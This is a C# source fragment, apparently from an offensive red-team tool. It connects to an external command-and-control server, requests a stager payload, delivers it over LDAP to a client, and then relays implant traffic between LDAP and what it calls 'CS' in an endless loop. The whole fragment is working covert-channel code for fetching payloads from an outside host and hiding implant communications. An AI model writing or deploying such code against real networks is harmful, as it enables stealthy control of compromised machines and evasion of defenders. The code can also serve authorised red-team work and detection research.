public static byte[] getStage(Transport.Relayer Relayer, string pipename, bool isX64) { var arch = isX64 ? "x64" : "x86"; Misc.WriteGood(string.Format("Requesting stager...")); Relayer.Send(Encoding.ASCII.GetBytes("arch=" + arch)); Relayer.Send(Encoding.ASCII.GetBytes("pipename=" + pipename)); Relayer.Send(Encoding.ASCII.GetBytes("block=100")); Relayer.Send(Encoding.ASCII.GetBytes("go")); // Sleep a little so the TS can process the request System.Threading.Thread.Sleep(200); byte[] payload = Relayer.ReadFrame(); Misc.WriteGood(string.Format("Received stager ({0} KB)", payload.Length / 1024)); return(payload); }
/// <summary> /// Handles the logic for communicating with the client over LDAP en transporting it to our C2 server /// </summary> static void Server() { // amount of sleep between polling int sleepInterval = 50; // connect to external C2 Core.Transport.Relayer Relayer = new Core.Transport.Relayer(SERVER_IP, SERVER_PORT); if (Relayer.IsConnected) { Misc.WriteGood(string.Format("Connected to {0}:{1}", SERVER_IP, SERVER_PORT)); } else { Console.WriteLine("[-] Cannot connect to {0}:{1}", SERVER_IP, SERVER_PORT); return; } // Initiate LDAP connection Core.LDAP LDAPConnection = integratedAuth ? new Core.LDAP(IsClient, UseLDAPS) : new Core.LDAP(username, password, domain, IsClient, UseLDAPS); if (!LDAPConnection.TestLDAPConnection()) { Console.WriteLine("[-] Cannot connect to LDAP with the information provided."); return; } if (!LDAPConnection.AutoDiscover()) { return; } // receive stager from C2 var payload = Stage.getStage(Relayer, LDAPConnection.pipeName, LDAPConnection.isX64); Misc.WriteGood(string.Format("Payload received. Payload size: {0}KB", payload.Length / 1024)); // Send payload over LDAP to third party client Misc.WriteGood(string.Format("Sending payload over LDAP...")); LDAPConnection.Send(payload); // run indefintely bool run = true; bool readController = false; do { // Handle LDAP connection byte[] data = LDAPConnection.Receive(); if (data != null) { Misc.WriteGood(string.Format("Relaying {0} bytes from LDAP to CS", data.Length)); // Send data over LDAP to controller Relayer.Send(data); readController = true; } else { System.Threading.Thread.Sleep(sleepInterval); } // Wait for CS / LDAP if (!readController) { continue; } // Handle CS connection data = Relayer.ReadFrame(); if (data != null) { Misc.WriteGood(string.Format("Relaying {0} bytes data from CS to LDAP", data.Length)); LDAPConnection.Send(data); readController = false; } else { System.Threading.Thread.Sleep(sleepInterval); } } while (run); }